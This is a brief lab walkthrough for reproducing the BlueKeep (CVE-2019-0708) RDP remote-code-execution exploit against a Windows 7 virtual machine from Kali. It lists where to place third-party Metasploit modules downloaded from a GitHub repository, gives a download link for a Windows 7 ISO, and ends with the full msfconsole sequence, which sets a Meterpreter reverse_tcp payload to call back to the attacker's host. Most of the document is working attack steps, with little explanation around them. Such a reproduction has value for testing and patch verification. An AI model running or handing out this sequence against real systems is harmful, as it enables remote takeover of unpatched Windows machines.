Vulnerable environment

  • 192.168.91.136 Windows 7 6.1.7601

  • 192.168.91.151 Kali

    Windows 7 SP1 download link:

ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

Reproduction steps

1. First, update MSF

apt-get update
apt-get install metasploit-framework

2. Import the scripts

Next, download the RCE scripts and place each downloaded script directly into its corresponding directory:

rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb 
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Download address:

https://github.com/NAXG/cve_2019_0708_bluekeep_rce

3. Reload the scripts

msfconsole 
reload_all

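4. Attack

Use set RHOSTS <victim IP> to set the victim machine's IP

Use set RPORT <victim port> to set the victim machine's RDP port

Use set target <ID number> (0-4 available) to set the victim machine's architecture

lhost usually does not need to be set; the payload must be set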

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 
set lhost 192.168.91.151
set rhost 192.168.91.136
set payload windows/x64/meterpreter/reverse_tcp
set target 1
run

At present this exploit only works on Windows 7 6.1.7601 and Windows 2008 R2.

END